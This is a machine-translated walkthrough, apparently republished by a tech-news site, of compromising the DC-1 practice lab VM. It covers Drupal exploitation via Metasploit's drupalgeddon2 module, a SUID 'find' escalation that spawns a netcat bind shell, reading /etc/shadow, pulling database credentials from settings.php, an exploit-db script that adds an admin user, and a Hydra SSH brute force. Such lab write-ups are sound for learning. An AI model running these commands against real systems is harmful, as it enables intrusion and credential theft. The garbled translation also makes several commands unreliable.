Shulou(Shulou.com)06/01 Report--

**

IP:192.168.110.212

**

I. arp-scan-l view the hosts that survive in the same area.

Knowing the ip, then we visit the home page as follows:

First, collect information and use nmap for port scanning to find the following ports for scanning:

22 (ssh) 80 (http). 111( rpcbind) 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) | _ 256 3d:aa:98:5c:87:af:ea: 84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) | _ http-generator: Drupal 7 (http://drupal.org)| http-robots.txt: 36 disallowed entries (15 shown) | / includes/ / misc/ / modules/ / profiles/ / scripts/ | / themes/ / CHANGELOG.txt / cron.php / INSTALL.mysql.txt | / INSTALL.pgsql.txt / INSTALL.sqlite. Txt / install.php / INSTALL.txt | _ / LICENSE.txt / MAINTAINERS.txt | _ http-server-header: Apache/2.2.22 (Debian) | _ http-title: Welcome to Drupal Site | Drupal Site111/tcp open rpcbind 2-4 (RPC # 100000) | rpcinfo: | program version port/proto service | 100000 2 4 111/tcp rpcbind | 100000 2 37414/udp status 3 111/udp rpcbind | 100000 3 111/tcp6 rpcbind 4 111/udp6 rpcbind | 100000 3 111/udp6 rpcbind | 100024 1 35108/tcp6 status | 100024 1 37240/udp6 status | 100024 1 37414/udp status | _ 100024 1 51353/tcp statusService Info: OS: Linux CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

Version:

Content Management system (CMS) Drupal7

Web Server Apache2.2.22

Programming language PHP5.4.45

Operating system Debian

JavaScript Library jQuery1.4.4

two。 After collecting the information, I first started to search from https://www.exploit-db.com/?type=webapps, which is based on his version, but in the end there was no result. Finally, from the hand under the home page, I could see that his cms was Drupal.

Then checked the loopholes about him on the Internet.

three。 Directly use msf to query search drupal, because there are many, I first use the time is relatively short

Unix/webapp/drupal_drupalgeddon2 module

Directly set sets ip to use run-j, and then gets shell directly.

Enter python-c 'import pty;pty.spawn ("/ bin/sh")'

four。 Check his system uname-an and find it's linux.

Linux DC-1 3.2.0-6-486 # 1 Debian 3.2.102-1 i686 GNU/Linux

After the promotion of power, I found it on the Internet.

Now use suid to search for rights by find first.

Find /-user root-perm-4000-print 2 > / dev/null

If it is found that the Find command is also run with Suid privileges, all commands that will be executed through find will be executed with root privileges.

five。 I first created a text file myself and then typed: find chen-exec whoami\

Find chen-exec netcat-lvp 5555-e / bin/sh\

six。 The other side is listening.

seven。 I first found flag4:flag4:$6 $Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC in the shadow under etc after the rights were granted.

Continue to look at the sensitive file / var/www and find 1 it prompts: every good CMS needs a configuration file, and so do you.

eight。 So then I looked up where the drupal configuration file was on the Internet.

/ sites/default/settings.php

First queried by find.

Cat / var/www/sites/default/settings.php saw his user name and password here.

'username' = >' dbuser', 'password' = >' R0ck3t'

Now that we know his user and password, we can connect.

nine。 Use cat to view the version information in his configuration file

Cat / var/www/includes/bootstrap.inc | grep VERSION

Get VERSION', '7.24

At the beginning of using searchsploit Drupal, there are some python scripts.

Python / usr/share/exploitdb/exploits/php/webapps/34992.py-t http://192.168.110.212-u chen-p chen

ten。 Log in from the user and password you just added using the python script

eleven。 Because his user name is already known (the user name found in shadow, so now you can blow up Hydra directly)

Hydra-l flag4-P pass.txt ssh://192.168.110.212

twelve。 Now we know that his password is orange.

The connection is successful!

User name: flag4

Password: orange

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.